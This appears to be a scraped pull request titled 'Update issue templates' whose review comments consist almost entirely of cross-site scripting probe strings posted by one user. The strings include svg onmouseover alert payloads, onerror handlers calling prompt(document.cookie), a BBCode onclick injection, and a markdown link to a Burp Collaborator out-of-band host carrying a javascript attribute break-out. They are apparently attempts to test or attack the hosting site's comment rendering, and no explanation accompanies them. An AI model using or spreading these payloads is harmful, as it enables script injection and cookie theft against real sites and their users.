### PR TITLE
Update issue templates

### PR DESCRIPTION
**Pull request by kukibrkica**

### CODE REVIEW

**Comment by kukibrk** [comment]
a'"`svg onmouseover="alert('xss')"

**Comment by kukibrk** [comment]
[test](http://aesp0o9fk3fyb29csn6303icr3xulj.burpcollaborator.net "javascript="alert('xss')" yyy="test"")

**Comment by kukibrk** [comment]
[url=google.com:/onclick='alert(document.domain)'[url=]]xss[/url]

**Comment by kukibrk** [comment]
a'"`onerror=prompt(document.cookie)\

**Comment by kukibrk** [comment]
a'"`onerror=prompt(document.cookie)

**Comment by kukibrk** [comment]
a'"`onerror=prompt(document.cookie))

**Comment by kukibrk** [comment]
a'"`svg onmouseover="alert('xss')"

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xss')"-)

**Pull request closed without merging**
